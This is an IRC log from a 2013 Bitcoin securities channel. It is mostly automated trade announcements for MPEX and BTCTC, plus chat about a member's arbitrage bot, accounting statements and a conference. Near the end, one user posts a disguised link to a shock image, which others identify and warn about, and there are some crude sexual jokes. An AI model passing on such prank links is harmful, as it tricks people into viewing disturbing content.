16:03:39 [MPEX] [S.MPOE] 2282 @ 0.00065437 = 1.4933 BTC [-] Jan 27 16:03:41 [MPEX] [S.MPOE] 4600 @ 0.0006542 = 3.0093 BTC [-] Jan 27 16:03:42 [MPEX] [S.MPOE] 11918 @ 0.00065401 = 7.7945 BTC [-] Jan 27 16:08:55 ;;ident mircea_popescu Jan 27 16:08:55 Nick 'mircea_popescu', with hostmask 'mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu', is not identified. Jan 27 16:09:07 ;;eauth mircea_popescu Jan 27 16:09:09 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Jan 27 16:09:36 ;;everify freenode:#bitcoin-otc:de790257e5a4b9d6efd7aae3ee154d1d499018b75cdb32a818f57b8f Jan 27 16:09:37 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Jan 27 16:10:14 ;;rate bugpowder 3 I'd be very much surprised if he ran off with your coins. Jan 27 16:10:20 Rating entry successful. Your rating for user bugpowder has changed from 1 to 3. Jan 27 16:11:00 ;;unrate pigeons Jan 27 16:11:02 Successfully removed your rating for pigeons. Jan 27 16:12:20 ;;rate rdponticelli 1 been around for a while. Jan 27 16:12:21 Rating entry successful. Your rating for user rdponticelli has changed from 2 to 1. Jan 27 16:12:38 ;;rate rdponticelli 2 He's in the MPEx FAQ! Jan 27 16:12:40 Rating entry successful. Your rating for user rdponticelli has changed from 1 to 2. Jan 27 16:20:46 [MPEX] [O.BTCUSD.P160T] 3 @ 0.1755816 = 0.5267 BTC [+] Jan 27 16:25:48 [MPEX] [O.BTCUSD.P160T] 2 @ 0.17513865 = 0.3503 BTC [-] Jan 27 16:29:10 that your bot smickles ? Jan 27 16:32:24 [MPEX] [O.BTCUSD.P160T] 1 @ 0.17510239 BTC [-] Jan 27 16:35:37 [MPEX] [S.MPOE] 2532 @ 0.00065401 = 1.656 BTC [-] Jan 27 16:35:39 [MPEX] [S.MPOE] 350 @ 0.00065316 = 0.2286 BTC [-] Jan 27 16:35:41 [MPEX] [S.MPOE] 20673 @ 0.00065315 = 13.5026 BTC [-] Jan 27 16:35:42 [MPEX] [S.MPOE] 6356 @ 0.00065303 = 4.1507 BTC [-] Jan 27 16:35:43 [MPEX] [S.MPOE] 3400 @ 0.00065297 = 2.2201 BTC [-] Jan 27 16:35:45 [MPEX] [S.MPOE] 8900 @ 0.00065261 = 5.8082 BTC [-] Jan 27 16:46:24 "mr. popescu I have a warrant for your extradition" Jan 27 16:57:28 [MPEX] [S.DICE] 1000 @ 0.00745 = 7.45 BTC [+] Jan 27 17:07:11 [MPEX] [S.MPOE] 10566 @ 0.00065107 = 6.8792 BTC [-] Jan 27 17:11:01 ;;seen smickles Jan 27 17:11:02 smickles was last seen in #bitcoin-assets 8 hours, 32 minutes, and 35 seconds ago: mod6: might just be my neighborhood Jan 27 17:11:12 ;;seen mod6 Jan 27 17:11:12 mod6 was last seen in #bitcoin-assets 7 hours, 52 minutes, and 16 seconds ago: well, i suppose i better try to finish up that aws stuff. i'll bbs :) Jan 27 17:15:52 [BTCTC] [RSM] 100 @ 0.0087 = 0.87 BTC [-] Jan 27 17:16:06 ;;ticker Jan 27 17:16:07 BTCUSD ticker | Best bid: 17.70005, Best ask: 17.70404, Bid-ask spread: 0.00399, Last trade: 17.70000, 24 hour volume: 32922.39363327, 24 hour low: 16.80000, 24 hour high: 17.99999, 24 hour vwap: 17.45621 Jan 27 17:16:20 [BTCTC] [RSM] 100 @ 0.0088 = 0.88 BTC [+] Jan 27 17:17:02 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21048121 BTC [+] Jan 27 17:23:26 [MPEX] [O.BTCUSD.P160T] 1 @ 0.17271225 BTC [-] Jan 27 17:24:08 [BTCTC] [RSM] 27 @ 0.0089 = 0.2403 BTC [+] Jan 27 17:26:25 [MPEX] [S.DICE] 1400 @ 0.00745 = 10.43 BTC [+] Jan 27 17:26:54 geez Jan 27 17:30:55 [MPEX] [O.BTCUSD.C180T] 1 @ 0.2195444 BTC [+] Jan 27 17:30:57 [MPEX] [O.BTCUSD.P160T] 1 @ 0.18446008 BTC [+] Jan 27 17:36:34 [MPEX] [O.BTCUSD.P160T] 1 @ 0.17267589 BTC [-] Jan 27 17:37:10 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21039942 BTC [-] Jan 27 17:37:37 straight up arbritrage that has to be smickles bot... Jan 27 17:39:28 [MPEX] [S.MPOE] 11936 @ 0.00065131 = 7.774 BTC [+] Jan 27 17:41:30 [MPEX] [S.MPOE] 15834 @ 0.00065107 = 10.309 BTC [-] Jan 27 17:41:32 [MPEX] [S.MPOE] 34900 @ 0.00065076 = 22.7115 BTC [-] Jan 27 17:41:33 [MPEX] [S.MPOE] 8784 @ 0.00065009 = 5.7104 BTC [-] Jan 27 17:43:58 [MPEX] [O.BTCUSD.P160T] 1 @ 0.17263946 BTC [-] Jan 27 17:51:01 [MPEX] [O.BTCUSD.P160T] 1 @ 0.18578383 BTC [+] Jan 27 17:51:07 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21057661 BTC [+] Jan 27 17:52:19 mircea_popescu: you have the Peter Lambert endorsement! https://bitcointalk.org/index.php?topic=138769.msg1482389#msg1482389 Jan 27 17:57:28 [MPEX] [O.BTCUSD.P160T] 1 @ 0.17228919 BTC [-] Jan 27 17:57:46 next line: Mwhuhahaha F MPEX! LOL Jan 27 17:57:48 And his Romanian Hooker Industrie. Jan 27 17:58:46 [MPEX] [S.MPOE] 5003 @ 0.00065131 = 3.2585 BTC [+] Jan 27 17:58:48 [MPEX] [S.MPOE] 12197 @ 0.0006601 = 8.0512 BTC [+] Jan 27 18:00:38 Greets from unsystem Jan 27 18:01:02 quite a mess, 100ppl in small room Jan 27 18:01:50 [MPEX] [S.MPOE] 10420 @ 0.0006601 = 6.8782 BTC [+] Jan 27 18:01:52 [MPEX] [S.MPOE] 12454 @ 0.00066096 = 8.2316 BTC [+] Jan 27 18:01:53 [MPEX] [S.MPOE] 350 @ 0.00066435 = 0.2325 BTC [+] Jan 27 18:01:54 [MPEX] [S.MPOE] 224 @ 0.00066436 = 0.1488 BTC [+] Jan 27 18:02:21 frank braun dude talking about red pill with covered mouth Jan 27 18:02:44 [MPEX] [S.DICE] 1600 @ 0.00745 = 11.92 BTC [+] Jan 27 18:04:24 wtf does that even mean? Jan 27 18:04:35 [MPEX] [O.BTCUSD.P160T] 1 @ 0.17132517 BTC [-] Jan 27 18:04:36 the reason stocks go up at the end of the month is because of dividends Jan 27 18:04:44 [MPEX] [S.DICE] 218 @ 0.00745 = 1.6241 BTC [+] Jan 27 18:04:48 mpoe was at an all time high yesterday Jan 27 18:05:15 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21131361 BTC [+] Jan 27 18:06:13 !ticker Jan 27 18:06:13 The eagle never lost so much time as when he submitted to learn from the crow. Jan 27 18:06:17 ;;ticker Jan 27 18:06:18 BTCUSD ticker | Best bid: 17.86000, Best ask: 17.86999, Bid-ask spread: 0.00999, Last trade: 17.86000, 24 hour volume: 34294.32645943, 24 hour low: 16.80000, 24 hour high: 17.99999, 24 hour vwap: 17.48678 Jan 27 18:06:29 jesus christ we're going back up again Jan 27 18:09:22 just for a little bit, the price is volatile right now... Jan 27 18:09:48 !ticker m S.MPOE Jan 27 18:09:50 [MPEX:S.MPOE] 1D: 0.00065009 / 0.00067014 / 0.0006941 (2679116 shares, 1,795.39 BTC), 7D: 0.00059445 / 0.00065507 / 0.0007 (24905979 shares, 16,315.34 BTC), 30D: 0.00059445 / 0.00065322 / 0.0007 (54291563 shares, 35,464.78 BTC) Jan 27 18:11:51 [MPEX] [O.BTCUSD.P160T] 1 @ 0.17097757 BTC [-] Jan 27 18:12:28 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21152998 BTC [+] Jan 27 18:17:15 [MPEX] [O.BTCUSD.C170T] 3 @ 0.23838039 = 0.7151 BTC [+] Jan 27 18:19:10 [MPEX] [O.BTCUSD.P160T] 3 @ 0.17097757 = 0.5129 BTC [-] Jan 27 18:19:50 [MPEX] [O.BTCUSD.C170T] 1 @ 0.23509237 BTC [-] Jan 27 18:21:20 look at smickles bot go as the price moves XD Jan 27 18:21:25 ;;ticker Jan 27 18:21:26 BTCUSD ticker | Best bid: 17.69753, Best ask: 17.70000, Bid-ask spread: 0.00247, Last trade: 17.70000, 24 hour volume: 34557.18061017, 24 hour low: 16.83255, 24 hour high: 17.99999, 24 hour vwap: 17.49307 Jan 27 18:24:30 ;;ticker Jan 27 18:24:30 BTCUSD ticker | Best bid: 17.68501, Best ask: 17.70000, Bid-ask spread: 0.01499, Last trade: 17.70000, 24 hour volume: 34594.12117077, 24 hour low: 16.83255, 24 hour high: 17.99999, 24 hour vwap: 17.49381 Jan 27 18:25:45 jurov: you're just attending or also presenting coinbr? Jan 27 18:26:39 [MPEX] [O.BTCUSD.P160T] 3 @ 0.17094214 = 0.5128 BTC [-] Jan 27 18:26:55 [BTCTC] [BTC-BOND] 12 @ 0.0097 = 0.1164 BTC [-] Jan 27 18:27:23 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21149215 BTC [-] Jan 27 18:29:44 [MPEX] [O.BTCUSD.C170T] 1 @ 0.23939225 BTC [+] Jan 27 18:33:51 [MPEX] [O.BTCUSD.P160T] 3 @ 0.17090276 = 0.5127 BTC [-] Jan 27 18:34:30 [MPEX] [O.BTCUSD.C170T] 1 @ 0.2392789 BTC [-] Jan 27 18:35:03 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21107001 BTC [-] Jan 27 18:39:37 I'm presenting. Dunno when,it's quite a mess. Jan 27 18:41:17 [MPEX] [S.MPOE] 17500 @ 0.00066436 = 11.6263 BTC [+] Jan 27 18:42:05 [MPEX] [O.BTCUSD.P160T] 3 @ 0.17086708 = 0.5126 BTC [-] Jan 27 18:42:43 [MPEX] [O.BTCUSD.C170T] 1 @ 0.2392789 BTC [-] Jan 27 18:43:14 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21107001 BTC [-] Jan 27 18:43:37 < mod6> smickles: have you been up to flagstaff yet? << I've visited there years ago, but not since I moved out here. Jan 27 18:44:13 < jurov> smickles, mpex.py -l - DISABLES logging. read teh help... << I know, but I suspected the syntax error came from the logger at the time. Jan 27 18:50:08 [MPEX] [O.BTCUSD.C170T] 1 @ 0.2392789 BTC [-] Jan 27 18:50:15 < mircea_popescu> that your bot smickles ? << could be Jan 27 18:51:01 [MPEX] [O.BTCUSD.P160T] 3 @ 0.1916273 = 0.5749 BTC [+] Jan 27 18:52:41 ;;calc 16/(.17-1) Jan 27 18:52:42 -19.2771084337 Jan 27 18:54:08 ;;calc 16/(.19+1) Jan 27 18:54:08 13.4453781513 Jan 27 18:55:12 [MPEX] [S.DICE] 365 @ 0.00742893 = 2.7116 BTC [-] Jan 27 18:56:57 [MPEX] [O.BTCUSD.P160T] 3 @ 0.1708275 = 0.5125 BTC [-] Jan 27 18:57:30 [MPEX] [O.BTCUSD.C170T] 1 @ 0.2392789 BTC [-] Jan 27 18:58:03 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21107001 BTC [-] Jan 27 19:01:04 hey smickles Jan 27 19:01:07 pm real quick? Jan 27 19:03:35 [MPEX] [S.MPOE] 14150 @ 0.00065333 = 9.2446 BTC [-] Jan 27 19:03:36 [MPEX] [S.MPOE] 1550 @ 0.00065089 = 1.0089 BTC [-] Jan 27 19:04:36 [MPEX] [O.BTCUSD.P160T] 3 @ 0.17017824 = 0.5105 BTC [-] Jan 27 19:04:53 okay, this one beats all. Jan 27 19:04:59 ? Jan 27 19:05:08 someone sent me an email which literalyl reads "gpg --armor --output pubkey.txt -- export " Jan 27 19:05:09 [MPEX] [O.BTCUSD.C170T] 1 @ 0.2392789 BTC [-] Jan 27 19:05:16 lol Jan 27 19:05:44 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21107001 BTC [-] Jan 27 19:06:04 i mean... the people sending the key and then being shocked and appaled that yes there's a reg fee i get daily nowadays and am starting to get used to. Jan 27 19:06:07 but this i confess is new. Jan 27 19:08:06 ;;bc,24hprc Jan 27 19:08:07 17.49 Jan 27 19:08:23 mircea - how many mpex account holders are there? Jan 27 19:09:39 lol, mircea_popescu, what did that person think would happen? Jan 27 19:12:38 [MPEX] [O.BTCUSD.P160T] 3 @ 0.17044449 = 0.5113 BTC [+] Jan 27 19:13:11 [MPEX] [O.BTCUSD.C170T] 1 @ 0.2392789 BTC [-] Jan 27 19:15:52 smickles yes. Jan 27 19:16:06 evoorhees edging towards 1k paid. Jan 27 19:16:33 [MPEX] [S.MPOE] 9276 @ 0.00066436 = 6.1626 BTC [+] Jan 27 19:16:34 [MPEX] [S.MPOE] 10434 @ 0.00066537 = 6.9425 BTC [+] Jan 27 19:16:59 nice Jan 27 19:19:28 gettin' there. Jan 27 19:20:16 [MPEX] [O.BTCUSD.C170T] 1 @ 0.2392789 BTC [-] Jan 27 19:20:38 [MPEX] [O.BTCUSD.P160T] 3 @ 0.19310956 = 0.5793 BTC [+] Jan 27 19:21:00 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21107001 BTC [-] Jan 27 19:27:31 [MPEX] [O.BTCUSD.P160T] 3 @ 0.17040888 = 0.5112 BTC [-] Jan 27 19:28:04 [MPEX] [O.BTCUSD.C170T] 1 @ 0.2392789 BTC [-] Jan 27 19:28:38 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21150956 BTC [+] Jan 27 19:30:58 [MPEX] [S.MPOE] 13966 @ 0.00066537 = 9.2926 BTC [+] Jan 27 19:30:59 [MPEX] [S.MPOE] 6660 @ 0.00066743 = 4.4451 BTC [+] Jan 27 19:31:01 [MPEX] [S.MPOE] 639 @ 0.00066836 = 0.4271 BTC [+] Jan 27 19:31:02 [MPEX] [S.MPOE] 11285 @ 0.00066858 = 7.5449 BTC [+] Jan 27 19:35:15 [MPEX] [O.BTCUSD.P160T] 3 @ 0.17036906 = 0.5111 BTC [-] Jan 27 19:35:51 [MPEX] [O.BTCUSD.C170T] 1 @ 0.23978863 BTC [+] Jan 27 19:37:22 [MPEX] [S.MPOE] 8200 @ 0.00066858 = 5.4824 BTC [+] Jan 27 19:42:45 [MPEX] [S.MPOE] 6900 @ 0.00066858 = 4.6132 BTC [+] Jan 27 19:45:25 [MPEX] [O.BTCUSD.P160T] 3 @ 0.17033275 = 0.511 BTC [-] Jan 27 19:45:52 [MPEX] [O.BTCUSD.C170T] 3 @ 0.23931001 = 0.7179 BTC [-] Jan 27 19:46:35 [MPEX] [O.BTCUSD.C180T] 1 @ 0.21104493 BTC [-] Jan 27 19:47:07 [MPEX] [O.BTCUSD.C190T] 3 @ 0.1881489 = 0.5644 BTC [+] Jan 27 19:53:52 [MPEX] [O.BTCUSD.P160T] 3 @ 0.17029694 = 0.5109 BTC [-] Jan 27 19:54:24 [MPEX] [O.BTCUSD.C170T] 3 @ 0.23931001 = 0.7179 BTC [-] Jan 27 19:54:59 [MPEX] [O.BTCUSD.P170T] 2 @ 0.20621262 = 0.4124 BTC [+] Jan 27 19:55:27 [MPEX] [O.BTCUSD.C180T] 3 @ 0.21104493 = 0.6331 BTC [-] Jan 27 19:56:03 [MPEX] [O.BTCUSD.C190T] 3 @ 0.1881489 = 0.5644 BTC [+] Jan 27 20:02:59 [MPEX] [O.BTCUSD.P160T] 3 @ 0.16995044 = 0.5099 BTC [-] Jan 27 20:03:32 [MPEX] [O.BTCUSD.C170T] 3 @ 0.23931001 = 0.7179 BTC [-] Jan 27 20:04:04 [MPEX] [O.BTCUSD.P170T] 3 @ 0.20579993 = 0.6174 BTC [-] Jan 27 20:04:39 [MPEX] [O.BTCUSD.C180T] 3 @ 0.21104493 = 0.6331 BTC [-] Jan 27 20:05:10 [MPEX] [O.BTCUSD.P180T] 2 @ 0.24718085 = 0.4944 BTC [+] Jan 27 20:06:28 BUY ALL THE OPTIONS! Jan 27 20:06:52 lol Jan 27 20:12:05 [MPEX] [O.BTCUSD.P160T] 3 @ 0.16991446 = 0.5097 BTC [-] Jan 27 20:12:41 [MPEX] [O.BTCUSD.C170T] 3 @ 0.23931001 = 0.7179 BTC [-] Jan 27 20:13:20 [MPEX] [O.BTCUSD.P170T] 3 @ 0.20576257 = 0.6173 BTC [-] Jan 27 20:13:23 i don't get this tho, why get 3 on this tick and 3 on the next tick Jan 27 20:13:29 wouldn't it make sense to just get 6 ? Jan 27 20:13:53 [MPEX] [O.BTCUSD.C180T] 3 @ 0.21104493 = 0.6331 BTC [-] Jan 27 20:14:29 [MPEX] [O.BTCUSD.P180T] 1 @ 0.2471424 BTC [-] Jan 27 20:14:58 the amount is calculated from a few inputs, it starts out as max(int(((mpexbtc / range_) / 2) / SATOSHI), 1) and is lowered by some other variables Jan 27 20:15:58 but leaving the code aside Jan 27 20:16:05 what sense does the behaviour make ? Jan 27 20:16:34 either its a good buy or it isn't. Jan 27 20:16:36 so those other variables are limiting the amount, and as these options are bought the limiting factors are raised a little Jan 27 20:17:06 and they're hard limits that I can't do much about right now Jan 27 20:17:37 but listen. what has materially changed from a tick to the next to make another increment worth buying, when it wasn't before ? Jan 27 20:18:45 heh, how much usd I know I have Jan 27 20:19:17 just... from a very fundamental perspective it seems amiss. Jan 27 20:19:18 but listen, the thing isn't optimized, there's room for improvement in many areas and I know it Jan 27 20:19:51 right now, it's easisist for me to take this 'one small step at a time' approach Jan 27 20:19:58 that i can see. Jan 27 20:20:49 im not saying it's evil or anything, just thowing 2cents. Jan 27 20:20:56 i've never coded a bot myself. Jan 27 20:21:46 oh don't get me wrong, it's a good 2 cents, and I knew it before you said it Jan 27 20:22:07 [MPEX] [O.BTCUSD.P160T] 3 @ 0.1698747 = 0.5096 BTC [-] Jan 27 20:22:49 EskimoBob: I should be able to answer a simple accounting question :) Jan 27 20:23:07 [MPEX] [O.BTCUSD.C170T] 3 @ 0.23931001 = 0.7179 BTC [-] Jan 27 20:23:40 [MPEX] [O.BTCUSD.P170T] 3 @ 0.2057213 = 0.6172 BTC [-] Jan 27 20:23:48 [MPEX] [S.MPOE] 17600 @ 0.0006649 = 11.7022 BTC [-] Jan 27 20:24:14 [MPEX] [O.BTCUSD.C180T] 2 @ 0.21104493 = 0.4221 BTC [-] Jan 27 20:24:23 EskimoBob: I haven't Jan 27 20:24:47 [MPEX] [O.BTCUSD.P180T] 2 @ 0.24709992 = 0.4942 BTC [-] Jan 27 20:31:52 [MPEX] [O.BTCUSD.P160T] 3 @ 0.16984047 = 0.5095 BTC [-] Jan 27 20:32:26 [MPEX] [O.BTCUSD.C170T] 3 @ 0.23931001 = 0.7179 BTC [-] Jan 27 20:32:59 [MPEX] [O.BTCUSD.P170T] 1 @ 0.20568576 BTC [-] Jan 27 20:39:21 [MPEX] [S.MPOE] 3400 @ 0.00065132 = 2.2145 BTC [-] Jan 27 20:43:57 [MPEX] [S.MPOE] 7350 @ 0.00065132 = 4.7872 BTC [-] Jan 27 20:43:58 [MPEX] [S.MPOE] 5523 @ 0.00065089 = 3.5949 BTC [-] Jan 27 20:43:59 [MPEX] [S.MPOE] 370 @ 0.0006501 = 0.2405 BTC [-] Jan 27 20:44:01 [MPEX] [S.MPOE] 10257 @ 0.00065009 = 6.668 BTC [-] Jan 27 20:49:46 [MPEX] [S.MPOE] 23500 @ 0.00065445 = 15.3796 BTC [+] Jan 27 21:14:35 [BTCTC] [COGNITIVE] 5 @ 0.3 = 1.5 BTC [-] Jan 27 21:14:36 [BTCTC] [COGNITIVE] 15 @ 0.3 = 4.5 BTC [-] Jan 27 21:14:38 [BTCTC] [COGNITIVE] 2 @ 0.3 = 0.6 BTC [-] **** BEGIN LOGGING AT Mon Jan 28 06:38:31 2013 Jan 28 06:47:53 [MPEX] [S.MPOE] 17204 @ 0.00065627 = 11.2905 BTC [-] Jan 28 06:47:54 [MPEX] [S.MPOE] 11956 @ 0.000651 = 7.7834 BTC [-] Jan 28 07:09:34 [MPEX] [S.MPOE] 22800 @ 0.00064714 = 14.7548 BTC [-] Jan 28 07:09:36 [MPEX] [S.MPOE] 1950 @ 0.00064 = 1.248 BTC [-] Jan 28 07:16:31 [MPEX] [S.MPOE] 24700 @ 0.00064 = 15.808 BTC [-] Jan 28 07:30:40 [MPEX] [S.MPOE] 7770 @ 0.00064 = 4.9728 BTC [-] Jan 28 07:30:41 [MPEX] [S.MPOE] 19150 @ 0.00063948 = 12.246 BTC [-] Jan 28 07:30:43 [MPEX] [S.MPOE] 13080 @ 0.00063915 = 8.3601 BTC [-] Jan 28 07:44:47 if anyone is looking for an economic/political debate --> http://trilema.com/2013/of-skimmed-milk-and-skimming-the-milk/ Jan 28 07:50:04 [MPEX] [S.MPOE] 23250 @ 0.00065009 = 15.1146 BTC [+] Jan 28 07:53:56 [BTCTC] [BTC-TRADING-PT] 13 @ 0.13 = 1.69 BTC [+] Jan 28 08:02:58 [MPEX] [S.DICE] 300 @ 0.00726989 = 2.181 BTC [+] Jan 28 08:11:36 [MPEX] [S.MPOE] 13324 @ 0.00065009 = 8.6618 BTC [+] Jan 28 08:15:53 [MPEX] [S.MPOE] 5800 @ 0.00063915 = 3.7071 BTC [-] Jan 28 08:16:34 [BTCTC] [BASIC-MINING] 10 @ 0.3399 = 3.399 BTC [-] Jan 28 08:26:08 [MPEX] [S.MPOE] 30129 @ 0.0006443 = 19.4121 BTC [+] Jan 28 08:26:10 [MPEX] [S.MPOE] 3421 @ 0.00063915 = 2.1865 BTC [-] Jan 28 09:25:52 [MPEX] [S.DICE] 1632 @ 0.00726989 = 11.8645 BTC [+] Jan 28 09:26:54 [MPEX] [S.MPOE] 4408 @ 0.00064847 = 2.8585 BTC [+] Jan 28 09:26:56 [MPEX] [S.MPOE] 292 @ 0.00063932 = 0.1867 BTC [-] Jan 28 09:32:31 [MPEX] [S.MPOE] 17851 @ 0.00063932 = 11.4125 BTC [-] Jan 28 09:33:59 [BTCTC] [BASIC-MINING] 17 @ 0.3399 = 5.7783 BTC [-] Jan 28 09:34:01 [BTCTC] [BASIC-MINING] 3 @ 0.34 = 1.02 BTC [+] Jan 28 09:34:14 [MPEX] [S.MPOE] 10866 @ 0.00065009 = 7.0639 BTC [+] Jan 28 09:34:15 [MPEX] [S.MPOE] 1534 @ 0.00065787 = 1.0092 BTC [+] Jan 28 09:42:45 [MPEX] [S.MPOE] 8807 @ 0.00063932 = 5.6305 BTC [-] Jan 28 09:42:47 [MPEX] [S.MPOE] 1393 @ 0.00063915 = 0.8903 BTC [-] Jan 28 09:45:26 [MPEX] [S.DICE] 1207 @ 0.00728138 = 8.7886 BTC [+] Jan 28 09:48:02 [MPEX] [S.MPOE] 12600 @ 0.00063915 = 8.0533 BTC [-] Jan 28 09:52:15 [MPEX] [S.MPOE] 19366 @ 0.00065787 = 12.7403 BTC [+] Jan 28 09:52:17 [MPEX] [S.MPOE] 19000 @ 0.00065822 = 12.5062 BTC [+] Jan 28 09:52:18 [MPEX] [S.MPOE] 1834 @ 0.00065823 = 1.2072 BTC [+] Jan 28 09:55:44 ;;ticker Jan 28 09:55:45 BTCUSD ticker | Best bid: 17.92002, Best ask: 17.95000, Bid-ask spread: 0.02998, Last trade: 17.92001, 24 hour volume: 24197.67894909, 24 hour low: 17.21000, 24 hour high: 18.00000, 24 hour vwap: 17.77575 Jan 28 09:59:32 ah finally, proper accounting for soebot Jan 28 10:00:00 i have income statements, balance sheets, cash flow, equity, the works Jan 28 10:00:01 :D Jan 28 10:01:43 wd! Jan 28 10:01:51 you gonna publish it ? Jan 28 10:02:42 hmm, hadn't considered it yet Jan 28 10:03:08 prolly a good thing for teh community Jan 28 10:03:34 have some examples. i bet you 90% of the people who are or are considering issuing "an asset" have never seen a set of gaap statements Jan 28 10:04:02 and since pretty much everyone is a 20something male geek, they learn by example rather than by description. Jan 28 10:04:10 Goooood morning Coinland Jan 28 10:04:13 hi. Jan 28 10:04:16 http://i.qkme.me/3sr4r6.jpg Jan 28 10:04:19 heh, i used gnucash for this. it makes proper gaap statements as far as i can tell Jan 28 10:04:43 did they eventually resolve the debate of what btc should be called ? Jan 28 10:04:56 error4733 tenses are fuct. Jan 28 10:05:01 i don't think so, i had to use XXX Jan 28 10:05:29 lol Jan 28 10:05:36 pr0nmoniz ? Jan 28 10:07:23 speaking of which, http://polimedia.us/dtng/c/src/135936043190.gif Jan 28 10:07:30 when they crash she learns to deepthroat. Jan 28 10:11:55 !ticker s.dice Jan 28 10:11:55 Aren't those tins of tobacco right there behind you? Jan 28 10:11:59 !ticker mpex s.dice Jan 28 10:12:00 [MPEX:S.DICE] 1D: 0.00722182 / 0.007425 / 0.00749999 (112051 shares, 831.98 BTC), 7D: 0.00085848 / 0.00522291 / 0.0075 (1190995 shares, 6,220.47 BTC), 30D: 0.00085848 / 0.00427442 / 0.0075 (10554315 shares, 45,113.65 BTC) Jan 28 10:12:02 fu assbot u know what i meant Jan 28 10:13:11 lol srsly. Jan 28 10:18:15 [MPEX] [S.MPOE] 14850 @ 0.00064792 = 9.6216 BTC [-] Jan 28 10:18:28 hmmm Jan 28 10:28:46 good evening Jan 28 10:29:21 hi Jan 28 10:43:13 the ass is dead, long live the ass! Jan 28 10:45:52 kakobrekla: https://images.encyclopediadramatica.se/5/5d/Hello.jpg Jan 28 10:47:56 -_- Jan 28 10:48:07 dntclicktht Jan 28 10:49:31 goatse Jan 28 10:54:03 lol, I almost clicked that link Jan 28 13:53:18 [MPEX] [S.DICE] 1907 @ 0.0073551 = 14.0262 BTC [+] Jan 28 13:53:18 [MPEX] [S.DICE] 450 @ 0.00745535 = 3.3549 BTC [+] Jan 28 13:53:19 [MPEX] [S.DICE] 17643 @ 0.00749999 = 132.3223 BTC [+] Jan 28 13:53:20 [MPEX] [S.MPOE] 20453 @ 0.00063915 = 13.0725 BTC [-] Jan 28 13:53:21 [MPEX] [S.MPOE] 7147 @ 0.00063885 = 4.5659 BTC [-] Jan 28 13:53:22 [MPEX] [S.DICE] 1423 @ 0.00737302 = 10.4918 BTC [-] Jan 28 13:53:23 [MPEX] [S.MPOE] 7950 @ 0.00064313 = 5.1129 BTC [+] Jan 28 13:53:24 [MPEX] [S.MPOE] 4350 @ 0.00064313 = 2.7976 BTC [+] Jan 28 13:53:25 [MPEX] [S.MPOE] 8893 @ 0.0006401 = 5.6924 BTC [-] Jan 28 13:53:26 [MPEX] [S.MPOE] 14853 @ 0.00063885 = 9.4888 BTC [-] Jan 28 13:53:27 [MPEX] [S.MPOE] 13804 @ 0.00063857 = 8.8148 BTC [-] Jan 28 13:53:27 [MPEX] [S.MPOE] 8096 @ 0.00063857 = 5.1699 BTC [-] Jan 28 13:53:28 [MPEX] [S.MPOE] 23317 @ 0.00063839 = 14.8853 BTC [-] Jan 28 13:53:29 [MPEX] [S.DICE] 1800 @ 0.00749999 = 13.5 BTC [+] Jan 28 13:53:30 [MPEX] [S.MPOE] 14850 @ 0.00064427 = 9.5674 BTC [+] Jan 28 13:53:31 [MPEX] [S.MPOE] 4200 @ 0.00064427 = 2.7059 BTC [+] Jan 28 13:53:32 [MPEX] [S.MPOE] 8000 @ 0.00065228 = 5.2182 BTC [+] Jan 28 13:53:33 [MPEX] [S.MPOE] 6283 @ 0.00063839 = 4.011 BTC [-] Jan 28 13:53:34 [MPEX] [S.MPOE] 1767 @ 0.00063831 = 1.1279 BTC [-] Jan 28 13:53:35 [MPEX] [S.MPOE] 12526 @ 0.00065254 = 8.1737 BTC [+] Jan 28 13:53:36 [MPEX] [S.MPOE] 4074 @ 0.00065823 = 2.6816 BTC [+] Jan 28 13:53:36 [MPEX] [S.MPOE] 18109 @ 0.00064378 = 11.6582 BTC [-] Jan 28 13:53:37 [MPEX] [S.MPOE] 1091 @ 0.00065823 = 0.7181 BTC [+] Jan 28 13:53:38 [MPEX] [S.MPOE] 14283 @ 0.00063831 = 9.117 BTC [-] Jan 28 13:53:39 [MPEX] [S.MPOE] 680 @ 0.00063725 = 0.4333 BTC [-] Jan 28 13:53:40 [MPEX] [S.MPOE] 21466 @ 0.00065182 = 13.992 BTC [+] Jan 28 14:03:02 [BTCTC] [ESECURITYSABTC] 1 @ 0.82 BTC [+] Jan 28 14:04:48 [BTCTC] [BASIC-MINING] 1 @ 0.34 BTC [+] Jan 28 14:07:12 [BTCTC] [ESECURITYSABTC] 1 @ 0.71 BTC [-] Jan 28 14:07:14 [BTCTC] [ESECURITYSABTC] 20 @ 0.7003 = 14.006 BTC [-] Jan 28 14:07:16 [BTCTC] [ESECURITYSABTC] 20 @ 0.7002 = 14.004 BTC [-] Jan 28 14:07:17 [BTCTC] [ESECURITYSABTC] 9 @ 0.7 = 6.3 BTC [-] Jan 28 14:12:06 [MPEX] [S.MPOE] 6139 @ 0.00065823 = 4.0409 BTC [+] Jan 28 14:12:08 [MPEX] [S.MPOE] 2911 @ 0.00065999 = 1.9212 BTC [+] Jan 28 14:20:43 "As we move forward into a world ever-filling with computers and networks, the success of Bitcoin, much like the Internet itself, liset in the actions of the people who will continue to use it and promote it and to fight on its behalf in doing so. They may take our lives, but they can never take our Bitcoin." Jan 28 14:21:06 ^^ bitcoin tabloid #6, page 57 Jan 28 14:21:11 got for free yest Jan 28 14:31:06 lmao yes mikhail alisie boasted they put it on the table next to cosmopolitan and circlejerk ensued "yeah, it feels similar" Jan 28 14:31:34 so i'm leafing in it and encountered this: http://live.coinbr.com/images/bfl.jpg Jan 28 14:31:54 had to scan it in. definitely cosmopolitan material Jan 28 14:32:35 jurov: are you russian? Jan 28 14:32:50 no, slovak Jan 28 14:33:05 why? Jan 28 14:33:11 i misspelled his name? Jan 28 14:34:17 lol Jan 28 14:34:22 where is 